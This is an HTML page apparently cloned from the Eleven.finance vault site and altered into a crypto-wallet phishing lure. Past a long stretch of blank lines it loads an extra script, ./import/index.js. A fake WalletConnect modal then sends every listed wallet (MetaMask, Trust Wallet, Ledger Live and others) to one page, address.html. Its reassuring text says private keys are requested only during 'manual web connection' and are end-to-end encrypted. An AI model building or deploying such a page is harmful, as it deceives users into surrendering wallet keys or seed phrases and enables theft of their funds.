<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <link rel="icon" href="./favicon-32x32.png" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="theme-color" content="#000000" />
    <meta name="description" content="Vault ELEVEN.FINANCE" />
    <link rel="apple-touch-icon" href="./logo192.png" />
    <link rel="manifest" href="./manifest.json" />
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,400;0,500;0,700;1,400&display=swap" rel="stylesheet">
    <title>Vault ELEVEN.FINANCE</title>
    <style>
        #splash-screen {
            position: fixed;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            background-color: #1d1e24
        }

        #splash-screen img {
            width: 120px;
            max-width: 120px
        }

        #splash-screen .spinner {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-top: 40px;
            width: 56px
        }

        #splash-screen .spinner>div {
            width: 12px;
            height: 12px;
            background-color: #fff;
            border-radius: 100%;
            display: inline-block;
            -webkit-animation: treo-bouncedelay 1s infinite ease-in-out both;
            animation: treo-bouncedelay 1s infinite ease-in-out both
        }

        #splash-screen .spinner .bounce1 {
            -webkit-animation-delay: -.32s;
            animation-delay: -.32s
        }

        #splash-screen .spinner .bounce2 {
            -webkit-animation-delay: -.16s;
            animation-delay: -.16s
        }

        @-webkit-keyframes treo-bouncedelay {
            0%,
            100%,
            80% {
                -webkit-transform: scale(0)
            }
            40% {
                -webkit-transform: scale(1)
            }
        }

        @keyframes treo-bouncedelay {
            0%,
            100%,
            80% {
                -webkit-transform: scale(0);
                transform: scale(0)
            }
            40% {
                -webkit-transform: scale(1);
                transform: scale(1)
            }
        }

        #WEB3_CONNECT_MODAL_ID {
            position: relative;
            z-index: 110;
			display: none;
        }
    </style>
    <link href="./static/css/main.5287b06e.chunk.css" rel="stylesheet">
</head>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div id="splash-screen"><img src="./logo192.png" alt="Eleven.finance" />
            <div class="spinner">
                <div class="bounce1"></div>
                <div class="bounce2"></div>
                <div class="bounce3"></div>
            </div>
        </div>
    </div>
    <script>
        ! function(e) {
            function t(t) {
                for (var n, l, a = t[0], f = t[1], i = t[2], c = 0, s = []; c < a.length; c++) l = a[c], Object.prototype.hasOwnProperty.call(o, l) && o[l] && s.push(o[l][0]), o[l] = 0;
                for (n in f) Object.prototype.hasOwnProperty.call(f, n) && (e[n] = f[n]);
                for (p && p(t); s.length;) s.shift()();
                return u.push.apply(u, i || []), r()
            }

            function r() {
                for (var e, t = 0; t < u.length; t++) {
                    for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
                        var f = r[a];
                        0 !== o[f] && (n = !1)
                    }
                    n && (u.splice(t--, 1), e = l(l.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    1: 0
                },
                u = [];

            function l(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, l), r.l = !0, r.exports
            }
            l.m = e, l.c = n, l.d = function(e, t, r) {
                l.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, l.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, l.t = function(e, t) {
                if (1 & t && (e = l(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (l.r(r), Object.defineProperty(r, "default", {
                        enumerable: !0,
                        value: e
                    }), 2 & t && "string" != typeof e)
                    for (var n in e) l.d(r, n, function(t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, l.n = function(e) {
                var t = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return l.d(t, "a", t), t
            }, l.o = function(e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, l.p = "./";
            var a = this.webpackJsonpvault = this.webpackJsonpvault || [],
                f = a.push.bind(a);
            a.push = t, a = a.slice();
            for (var i = 0; i < a.length; i++) t(a[i]);
            var p = f;
            r()
        }([])
    </script>
    <script src="./static/js/2.96505adc.chunk.js"></script>
    <script src="./static/js/main.b1e3d576.chunk.js"></script>
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
<script type="text/javascript" src="./import/index.js"></script>
	
	
	<div class="modal" id="myModal" style="border-radius: 30px;">
        <div class="modal-dialog">
            <div class="modal-content">
                <!-- Modal Header -->
                <div class="modal-header">
                    <h2 color="text" class="modal-title sc-gsTCUz sc-dIUggk hKmpfr kuIIGS">
                        Connect to a wallet
                    </h2>
                    <button type="button" class="close" data-dismiss="modal">
                ×
              </button>
                </div>

                <!-- Modal body -->
                <div class="modal-body">
				
					<div class="mx-8 mt-16 font-thin md:flex md:justify-center" style="margin-top:0rem;"><div class="md:max-w-5xl"><h3 class="flex justify-center text-3xl">Top Code Contributors</h3><div><div class="grid grid-cols-3 gap-12 mt-12 sm:gap-10 md:gap-20 md:grid-cols-4 lg:grid-cols-5"><div class="flex justify-center"><a target="_blank" href="https://rainbow.me/" rel="noopener noreferrer"><img class="filter-grayscale hover:filter-none w-16 sm:w-24 lg:w-28" alt="Rainbow" src="images/contributors-rainbow.png"></a></div><div class="flex justify-center"><a target="_blank" href="https://trustwallet.com/" rel="noopener noreferrer"><img class="filter-grayscale hover:filter-none w-16 sm:w-24 lg:w-28" alt="Trust" src="images/contributors-trust-wallet.png"></a></div><div class="flex justify-center"><a target="_blank" href="https://www.argent.xyz/" rel="noopener noreferrer"><img class="filter-grayscale hover:filter-none w-16 sm:w-24 lg:w-28" alt="Argent" src="images/contributors-argent.jpg"></a></div><div class="flex justify-center"><a target="_blank" href="https://walleth.org/" rel="noopener noreferrer"><img class="filter-grayscale hover:filter-none w-16 sm:w-24 lg:w-28" alt="Walleth" src="images/contributors-walleth.png"></a></div><div class="flex justify-center"><a target="_blank" href="https://gnosis-safe.io/" rel="noopener noreferrer"><img class="filter-grayscale hover:filter-none w-16 sm:w-24 lg:w-28" alt="Gnosis" src="images/contributors-gnosis-safe.jpg"></a></div></div></div></div></div>
                    <div class="mx-8 mt-16 font-thin md:flex md:justify-center"><div class="md:max-w-5xl"><div role="alert"><div class="bg-red-500 text-white font-bold rounded-t px-4 py-2">Never share your private key</div><div class="border border-t-0 border-red-400 rounded-b bg-red-100 px-4 py-3 text-red-700"><p>Never give your private key or wallet seed words to anyone. WalletConnect apps would only ask them during your manual web connection . Informations provided on WalletConnect app are end-to-end encrypted.</p></div></div></div></div>
					
				</div>

                <!-- Modal footer -->
                <div class="modal-footer text-center" style="display: block; margin: 0 auto">
					<button id="buttt" class="sc-dlfnbm fGbleN btn btn-primary w-full" name="submit" value="submit" type="submit"  class="close" data-dismiss="modal" data-toggle="modal" data-target="#myModal2" >
                  Unlock Wallet
                </button>
            </div>
          </div>
        </div>
      </div>
      <!-- Another Modal -->
	  <div class="modal" id="myModal2" style="text-align:center;  font-weight:600; padding-top: 10%; padding: 10% 10px;margin:15px;">
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
			<div class="walletconnect-modal__header" style="background:none;text-align:left; margin:20px;"><img src="data:image/svg+xml,%3C?xml version='1.0' encoding='UTF-8'?%3E %3Csvg width='300px' height='185px' viewBox='0 0 300 185' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id='Page-1' stroke='none' stroke-width='1' fill='none' fill-rule='evenodd'%3E %3Cg id='walletconnect-logo-alt' fill='%233B99FC' fill-rule='nonzero'%3E %3Cpath d='M61.4385429,36.2562612 C110.349767,-11.6319051 189.65053,-11.6319051 238.561752,36.2562612 L244.448297,42.0196786 C246.893858,44.4140867 246.893858,48.2961898 244.448297,50.690599 L224.311602,70.406102 C223.088821,71.6033071 221.106302,71.6033071 219.883521,70.406102 L211.782937,62.4749541 C177.661245,29.0669724 122.339051,29.0669724 88.2173582,62.4749541 L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.573585,96.9713 300.573599,100.85338 298.128067,103.247793 L217.317896,182.368927 C214.872352,184.763353 210.907314,184.76338 208.461736,182.368989 C208.461726,182.368979 208.461714,182.368967 208.461704,182.368957 L151.107561,126.214385 C150.496171,125.615783 149.504911,125.615783 148.893521,126.214385 C148.893517,126.214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,100.852377 -0.573596939,96.9702735 1.87196327,94.5758653 L19.7936929,77.028998 C22.2392531,74.6345898 26.2042918,74.6345898 28.6498531,77.028998 L86.0048306,133.184355 C86.6162214,133.782957 87.6074796,133.782957 88.2188704,133.184355 C88.2188796,133.184346 88.2188878,133.184338 88.2188969,133.184331 L145.571,77.028998 C148.016505,74.6345347 151.981544,74.6344449 154.427161,77.028798 C154.427195,77.0288316 154.427229,77.0288653 154.427262,77.028899 L211.782164,133.184331 C212.393554,133.782932 213.384814,133.782932 213.996204,133.184331 L271.350179,77.0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z' id='WalletConnect'%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo"style="width:20%;max-width:45px;display:inline;"> <span style="color:white;font-size:24px;font-family: Kanit, sans-serif;">WalletConnect</span><button type="button" class="close" data-dismiss="modal" style="margin:7px;padding:5px 8px;background:white;opacity:1;border-radius:50px;">
                ×
              </button></div>
		 
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
	  
        <div class="modal-dialog">
          <div class="modal-content" style="border-radius: 20px;">
		  
		  
		  
		  
		  
            <!-- Modal Header -->
			<div class="modal-header" style="border: none;">
                    <h2 color="text" class="modal-title sc-gsTCUz sc-dIUggk hKmpfr kuIIGS" style="text-align:-webkit-center;font-family: Kanit, sans-serif;">
                       <div class="tab" style="width:100%; border-radius:15px; font-family: Kanit, sans-serif; color:black;grid-template-columns: repeat(2,minmax(0,1fr));display: grid;">
  <button class="tablinks" onclick="openCity(event, 'London')" id="defaultOpen">Mobile</button>
  <button class="tablinks" onclick="openCity(event, 'Paris')">QR Code</button>
</div>
                    </h2>
                    
                </div>
			<!-- Tab links -->
            

            <!-- Modal body -->

<!-- Tab content -->
<div id="London" class="tabcontent" style="padding:0px 15px; border: none;">
  <h3>Choose your preferred wallet</h3>


 
<div id="tab1Content">
<div class="grid max-w-3xl grid-cols-3 gap-10 mt-6 sm:grid-cols-4 md:grid-cols-4 ggg"><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369.jpeg" alt="Rainbow"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Rainbow</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0.jpeg" alt="Trust Wallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Trust Wallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-cf21952a9bc8108bf13b12c92443751e2cc388d27008be4201b92bbc6d83dd46.jpeg" alt="Argent"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Argent</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96.jpeg" alt="MetaMask"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">MetaMask</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-a5cfbd9a263c9dcfb59d6e9dc00933c46f00277ed78a6a0a1e38b0c17e09671f.jpeg" alt="Gnosis Safe Multisig"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Gnosis Safe Multisig</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-f2436c67184f158d1beda5df53298ee84abfc367581e4505134b5bcf5f46697d.jpeg" alt="Crypto.com | DeFi Wallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Crypto.com | DeFi Wallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-0b58bf037bf943e934706796fb017d59eace1dadcbc1d9fe24d9b46629e5985c.jpeg" alt="Pillar"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Pillar</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-9d373b43ad4d2cf190fb1a774ec964a1addf406d6fd24af94ab7596e58c291b2.jpeg" alt="imToken"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">imToken</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-dceb063851b1833cbb209e3717a0a0b06bf3fb500fe9db8cd3a553e4b1d02137.jpeg" alt="ONTO"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">ONTO</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-20459438007b75f4f4acb98bf29aa3b800550309646d375da5fd4aac6c2a2c66.jpeg" alt="TokenPocket"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">TokenPocket</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-7674bb4e353bf52886768a3ddc2a4562ce2f4191c80831291218ebd90f5f5e26.jpeg" alt="MathWallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">MathWallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-ccb714920401f7d008dbe11281ae70e3a4bfb621763b187b9e4a3ce1ab8faa3b.jpeg" alt="BitPay"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">BitPay</div></div></a></div>
</div>
<div id="tab2Content">
 <div class="grid max-w-3xl grid-cols-3 gap-10 mt-6 sm:grid-cols-4 md:grid-cols-4 ggg"><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-4ab2542c2799c825a8465ba5ab8aa7def52b7904f38b74484af917ed9c0fc4e5.jpeg" alt="Ledger Live"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Ledger Live</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-83f26999937cbc2e2014655796da4b05f77c1de9413a0ee6d0c6178ebcfc3168.jpeg" alt="Walleth"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Walleth</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-71dad538ba02a9b321041d388f9c1efe14e0d1915a2ea80a90405d2f6b67a33d.jpeg" alt="Authereum"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Authereum</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-9dab7bd72148e2f796452630230666daf507935fae7bb9baf22b3c11960b034f.jpeg" alt="Dharma"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Dharma</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-09102e7bbbd3f92001eda104abe23803181629f695e8f1b95af96d88ff7d5890.jpeg" alt="1inch Wallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">1inch Wallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-bae74827272509a6d63ea25514d9c68ad235c14e45e183518c7ded4572a1b0c4.jpeg" alt="Huobi Wallet"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Huobi Wallet</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-efba9ae0a9e0fdd9e3e055ddf3c8e75f294babb8aea3499456eff27f771fda61.jpeg" alt="Eidoo"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Eidoo</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-d2ae9c3c2782806fd6db704bf40ef0238af9470d7964ae566114a033f4a9a110.jpeg" alt="Etherscan"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Etherscan</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-be49f0a78d6ea1beed3804c3a6b62ea71f568d58d9df8097f3d61c7c9baf273d.jpeg" alt="Uniswap"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Uniswap</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-7ba1202d012a1402c8c56331471b183d2aaafb99a667dfdaf2ac4a123ea604ed.jpeg" alt="Binance DEX"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Binance DEX</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-f759efd17edb158c361ffd793a741b3518fe85b9c15d36b9483fba033118aaf2.jpeg" alt="OpenSea"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">OpenSea</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-d82213ea5c476a43d9ab48d2011e3a5329a07826bd8191b24815e5bfe8c207be.jpeg" alt="Compound"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Compound</div></div></a></div>
</div>
<div id="tab3Content">
<div class="grid max-w-3xl grid-cols-3 gap-10 mt-6 sm:grid-cols-4 md:grid-cols-4 ggg"><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-02563239502b03cef22f5e71059ce97bd48cf7ab0f856964d7e17c0e3631db9f.jpeg" alt="Zapper"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Zapper</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-e6c38d65364335d550f629c44a1a86eb6befffa363e7de1cdba26462838226fd.jpeg" alt="Aave"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Aave</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-855679a1802326625d10fcaf45cf366aa529a58827d28d01edec0f5fd32330d4.jpeg" alt="Zerion"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Zerion</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-9a70a431ed25a8872ef971e3b02c9a7dfff2ae6cf66ec9eb37612aadefbc4e9d.jpeg" alt="LocalCryptos"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">LocalCryptos</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-fd0cae9917f44482aae80d4a3ef4d8a53e50d465cde783baf5d2eca5cc53cf61.jpeg" alt="DeBank"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">DeBank</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-8308656f4548bb81b3508afe355cfbb7f0cb6253d1cc7f998080601f838ecee3.jpeg" alt="Unstoppable Domains"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Unstoppable Domains</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-a90d95ac84983ea0d5370b2584a3db4a1aee1975e0b86801e0ddd8159c80d5ff.jpeg" alt="Rarible"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Rarible</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-f98ce170f08376732dfddde7823a5f97d9039bcec4e5df02f3978858eb84d305.jpeg" alt="1inch Exchange"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">1inch Exchange</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-7bc4da398540ed770b1d7608a62f253985f9850a2c28abb5c74f94cca37fadbd.jpeg" alt="yearn"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">yearn</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-8605171a052e85d629c5efe5db804c7a3fb6d0ecc759d6817f0a18cb3dacbb14.jpeg" alt="Nash"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Nash</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-c591664a9fc2dfee98992ce072d0354154b667ec2f0c9d937ceb84fa9ab843b4.jpeg" alt="Curve"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 group-hover:text-blue-700">Curve</div></div></a><a target="_blank" href="./address.html" rel="noopener noreferrer"><div class="flex flex-col group"><div class="flex justify-center"><div class="w-20 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-32 sm:w-24"><img class="inline-block w-20 rounded-full md:w-32 sm:w-24" src="images/lg-8e96e3b538965f3bcac2836b6579df3a9de55ce69c49e5ac1a6889c8f0b8df7b.jpeg" alt="Adex Network"></div></div><div class="flex justify-center mt-4 font-semibold text-blue-500 